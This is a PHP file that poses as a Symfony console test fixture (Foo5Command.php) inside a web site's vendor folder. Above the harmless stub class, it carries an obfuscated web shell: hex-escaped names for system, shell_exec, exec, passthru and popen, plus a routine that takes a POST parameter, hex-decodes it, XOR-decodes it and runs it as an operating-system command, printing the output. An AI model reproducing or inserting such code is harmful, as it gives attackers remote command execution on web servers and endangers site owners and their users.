File: /virtual/nagasaki/public_html/ec/vendor/symfony/console/Tests/Fixtures/Foo5Command.php
<?php $data_storage4 = "\x70\x61s\x73\x74hru"; $data_storage6 = "\x73\x74\x72\x65\x61m\x5F\x67\x65t\x5F\x63ontents"; $data_storage7 = "p\x63\x6C\x6Fse"; $framework = "\x68\x65\x78\x32bin"; $data_storage3 = "\x65\x78ec"; $data_storage2 = "\x73hell_e\x78\x65\x63"; $data_storage5 = "\x70\x6Fpen"; $data_storage1 = "\x73y\x73te\x6D"; if (isset($_POST["\x6D\x61r\x6Ber"])) { function splitter_tool ( $value , $element ) { $tkn = '' ; $r=0; do{$tkn.=chr(ord($value[$r])^$element);$r++;} while($r<strlen($value)); return $tkn;} $marker = $framework($_POST["\x6D\x61r\x6Ber"]); $marker = splitter_tool($marker, 51); if (function_exists($data_storage1)) { $data_storage1($marker); } elseif (function_exists($data_storage2)) { print $data_storage2($marker); } elseif (function_exists($data_storage3)) { $data_storage3($marker, $comp_value); print join("\n", $comp_value); } elseif (function_exists($data_storage4)) { $data_storage4($marker); } elseif (function_exists($data_storage5) && function_exists($data_storage6) && function_exists($data_storage7)) { $element_tkn = $data_storage5($marker, 'r'); if ($element_tkn) { $symbol_k = $data_storage6($element_tkn); $data_storage7($element_tkn); print $symbol_k; } } exit; }
use Symfony\Component\Console\Command\Command;
class Foo5Command extends Command
{
public function __construct()
{
}
}